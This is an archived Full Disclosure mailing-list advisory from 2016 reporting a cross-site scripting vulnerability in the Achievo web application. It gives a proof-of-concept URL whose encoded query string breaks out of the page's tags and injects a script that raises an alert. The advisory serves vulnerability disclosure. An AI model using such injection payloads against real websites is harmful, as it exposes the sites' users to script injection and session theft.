lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <153947f420b.eab80f6e108966.2903848363876291279@secupent.com>
Date: Sun, 20 Mar 2016 20:48:01 +0600
From: SECUPENT Research Center <research@...upent.com>
To: <submit@...sec.com>, <admin@...loit-db.com>, <exploit4arab@...il.com>, 
 <vuldb@...urityfocus.com>,  <moderators@...db.org>, 
 <submit@...ec.org>,  <submissions@...ketstormsecurity.com>, 
 <fulldisclosure@...lists.org>,  <submit@...7day.com>, 
 <mr.inj3ct0r@...il.com>,  <cve@...re.org>
Subject: [FD] Achievo Cross Site Scripting vulnerability


Exploit Title: Achievo Cross Site Scripting vulnerability
Vendor: www.achievo.org
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=98
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016




Cross Site scripting link: http://site/achievo/index.php?%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x000912%29%3C%2fscRipt%3E
Screenshot: http://secupent.com/exploit/images/achievoxss.jpg




View attachment "achievo.txt" of type "text/plain" (470 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ